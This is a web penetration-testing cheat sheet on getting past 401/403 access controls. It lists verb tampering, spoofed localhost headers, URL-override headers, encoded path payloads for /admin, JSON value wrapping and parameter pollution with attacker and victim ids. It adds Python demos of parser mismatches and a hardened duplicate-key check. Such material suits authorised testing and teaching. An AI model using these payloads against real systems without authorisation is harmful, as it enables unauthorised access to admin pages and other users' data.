Bypass 401 & 403

In web pentesting, a 401 (Unauthorized) or 403 (Forbidden) response tells you that an access control exists; bypassing it means finding a request that the component enforcing the rule lets through but that the backend still serves as the protected resource. Techniques such as HTTP verb tampering, HTTP header fuzzing and path fuzzing are commonly used to find these inconsistencies and gain unauthorized access.

HTTP Verbs/Methods Fuzzing

Try using different verbs (methods) to access the file: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, and non-standard ones such as INVENTED or HACK. Access rules are often written per method (for example only GET and POST are restricted) and many backends fall through to the GET handler for any method they do not recognise, so a 403 on GET can become a 200 on HEAD, on PUT or on an arbitrary verb. PUT and DELETE may change state on the backend, so try them last.

HTTP Headers Fuzzing

Try the proxy/client-address headers below (for access controls that allow requests from localhost or from an internal range), HTTP Basic and NTLM authentication brute force (with a few combinations only, to avoid account lockouts) and other techniques.

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
Host: localhost

If 127.0.0.1 is not accepted, also try a private address (for example 10.0.0.1 or 192.168.1.1) in the same headers.

If the path is protected, you can try to bypass the path protection with URL override headers: request an allowed path (for example /) and point the header at the protected one. The front end checks the request line, while some frameworks rewrite the routed URL from these headers after that check has run:

GET / HTTP/1.1
X-Original-URL: /admin

GET / HTTP/1.1
X-Rewrite-URL: /admin

Path Fuzzing

If /admin is blocked:

  • Try using /%2e/admin: if the front end (proxy, WAF) matches the raw request path while the backend decodes it and resolves dot segments, the proxy sees /%2e/admin and the backend serves /admin.

  • Try also /%252e/admin (double URL encoding), for backends that decode the path more than once.

  • Try a Unicode bypass: /%ef%bc%8fadmin. %ef%bc%8f is the UTF-8 encoding of U+FF0F FULLWIDTH SOLIDUS ("／"); a backend that applies Unicode normalisation turns it into an ASCII "/", giving //admin, which collapses to /admin, while the front end never saw the string "/admin" and its name check was already bypassed.

Other /admin bypasses:

  • site.com/admin –> HTTP 403 Forbidden

  • site.com/ADMIN –> HTTP 200 OK

  • site.com/admin/ –> HTTP 200 OK

  • site.com/admin/. –> HTTP 200 OK

  • site.com//admin// –> HTTP 200 OK

  • site.com/./admin/.. –> HTTP 200 OK

  • site.com/;/admin –> HTTP 200 OK

  • site.com/.;/admin –> HTTP 200 OK

  • site.com//;//admin –> HTTP 200 OK

  • site.com/admin.json –> HTTP 200 OK (Ruby on Rails treats .json as a format suffix for the same route)

Use the whole list above in each of the following positions, where FUZZ is replaced by each payload:

  • /FUZZsecret

  • /FUZZ/secret

  • /secretFUZZ
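Why the dot-segment, double-encoding, fullwidth-slash, semicolon and suffix tricks work is a mismatch between the component that checks the path and the one that serves it. The following is an added example, not from the original page, that models that mismatch in Python: proxy_allows is an assumed front-end rule that compares the raw, undecoded path with "/admin", and backend_resolve is an assumed backend that decodes repeatedly, applies Unicode NFKC normalisation, strips ;params from each segment, collapses slashes, resolves dot segments, drops a .json format suffix and routes case-insensitively. No single real server does all of these at once; each step stands in for a behaviour found in some stack, so the output shows which payload depends on which step.

```python
import posixpath
import re
import unicodedata
from urllib.parse import unquote

# The page's candidate list, exactly as a client would put it on the request line.
CANDIDATES = [
    "/admin", "/%2e/admin", "/%252e/admin", "/%ef%bc%8fadmin", "/ADMIN", "/admin/",
    "/admin/.", "//admin//", "/./admin/..", "/;/admin", "/.;/admin", "//;//admin",
    "/admin.json",
]


def proxy_allows(raw_path, protected="/admin"):
    """Constructed model of a front-end ACL that compares the raw, undecoded
    request path against an exact-match rule (assumption: no normalisation at all)."""
    return raw_path != protected


def backend_resolve(raw_path):
    """Constructed model of an over-normalising backend. Each step stands for a
    behaviour seen in some real stack; combining them all is an assumption for the demo."""
    p = raw_path
    for _ in range(3):                    # decode until stable: models double URL decoding
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    p = unicodedata.normalize("NFKC", p)  # U+FF0F FULLWIDTH SOLIDUS becomes ASCII "/"
    # Drop ";param" from every segment, as servlet containers do with ;jsessionid
    p = "/".join(seg.split(";", 1)[0] for seg in p.split("/"))
    p = re.sub(r"/+", "/", p)             # collapse repeated slashes
    p = posixpath.normpath(p)             # resolve "." and ".." segments
    if p.endswith(".json"):               # Rails-style format suffix selects a response
        p = p[: -len(".json")]            # format, not a different route
    return p.lower()                      # case-insensitive routing (e.g. Windows file systems)


def find_bypasses(candidates=CANDIDATES, protected="/admin"):
    """Paths the proxy lets through that the backend still maps onto the protected route."""
    return [c for c in candidates
            if proxy_allows(c, protected) and backend_resolve(c) == protected]


if __name__ == "__main__":
    for c in CANDIDATES:
        if not proxy_allows(c):
            verdict = "BLOCKED"
        elif backend_resolve(c) == "/admin":
            verdict = "bypass "
        else:
            verdict = "no hit "
        print(f"{verdict} {c!r:22} -> backend sees {backend_resolve(c)!r}")
```

Running it prints, for each payload, whether the modelled proxy blocks it and what the backend resolves it to. Note that /./admin/.. resolves to / in this model: not every entry in the list works for the same reason, so a hit has to be confirmed against the real backend's response rather than assumed from the list.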

Some API bypasses:

  • /v3/users_data/1234 –> 403 Forbidden

  • /v1/users_data/1234 –> 200 OK (older API versions often lack the newer authorization checks)

  • {"id":111} -> 401 Unauthorized

  • {"id":[111]} -> 200 OK (wrap the value in an array)

  • {"id":111} -> 401 Unauthorized

  • {"id":{"id":111}} -> 200 OK (wrap the value in an object)

  • {"user_id":"<legit_id>","user_id":"<victims_id>"} (JSON Parameter Pollution: the component that authorizes and the component that fetches the data may pick different duplicates)

  • user_id=ATTACKER_ID&user_id=VICTIM_ID (Parameter Pollution: the same idea with query or form parameters)
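The two parameter-pollution entries rely on the authorising component and the data-access component parsing the same request differently. The following added example (not from the original page) shows that differential in Python with a constructed user store and made-up ids: gateway_authorize is assumed to act on the first user_id it sees, while backend_fetch uses json.loads and dict(parse_qsl(...)), which in Python keep the last duplicate. hardened_request shows the fix a practitioner would want, a strict parser shared by both components that rejects any repeated top-level key before either check runs.

```python
import json
from urllib.parse import parse_qsl

# Constructed in-memory store and identifiers (made up for the example).
USERS = {"1001": {"name": "attacker"}, "2002": {"name": "victim"}}


def first_value(pairs, key):
    """What a 'first occurrence wins' parser hands back for a repeated key."""
    return next((v for k, v in pairs if k == key), None)


def raw_pairs(raw, kind):
    """Parse a JSON body ("json") or a query string ("query") into ordered (key, value) pairs."""
    if kind == "json":
        return json.loads(raw, object_pairs_hook=lambda pairs: pairs)
    return parse_qsl(raw, keep_blank_values=True)


def gateway_authorize(current_user, raw, kind):
    """Constructed authorising component: assumed to act on the FIRST user_id it sees."""
    return first_value(raw_pairs(raw, kind), "user_id") == current_user


def backend_fetch(raw, kind):
    """Constructed data component: json.loads and dict(parse_qsl(...)) both keep the
    LAST duplicate in Python, so it acts on a different value than the gateway checked."""
    if kind == "json":
        params = json.loads(raw)
    else:
        params = dict(parse_qsl(raw, keep_blank_values=True))
    return USERS.get(params.get("user_id"))


def vulnerable_request(current_user, raw, kind):
    """Gateway check followed by backend fetch; each parses the raw request on its own."""
    if not gateway_authorize(current_user, raw, kind):
        return 403, None
    return 200, backend_fetch(raw, kind)


def strict_params(raw, kind):
    """Hardened parsing shared by both components: any repeated top-level key is an error."""
    seen = {}
    for key, value in raw_pairs(raw, kind):
        if key in seen:
            raise ValueError(f"duplicate parameter {key!r}")
        seen[key] = value
    return seen


def hardened_request(current_user, raw, kind):
    """Parse once, strictly, and run the check and the fetch on the same parsed value."""
    try:
        params = strict_params(raw, kind)
    except ValueError:
        return 400, None
    if params.get("user_id") != current_user:
        return 403, None
    return 200, USERS.get(params["user_id"])


if __name__ == "__main__":
    polluted = '{"user_id":"1001","user_id":"2002"}'
    print("vulnerable:", vulnerable_request("1001", polluted, "json"))
    print("hardened:  ", hardened_request("1001", polluted, "json"))
```

When testing a real target, send the legitimate id first and the victim's id second, then the other way round, since which duplicate each component picks depends on its parser.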

Parameter Manipulation

  • Change param value: From id=123 --> id=124

  • Add additional parameters to the URL: ?id=124 --> id=124&isAdmin=true

  • Remove the parameters

  • Re-order parameters

  • Use special characters

  • Perform boundary testing in the parameters: provide values like -234, 0 or 99999999

Protocol version

If the request is sent over HTTP/1.1, try HTTP/1.0 and test whether the server also accepts HTTP/2: access rules are sometimes bound to one protocol version or to one parser, so the same path can be answered differently.
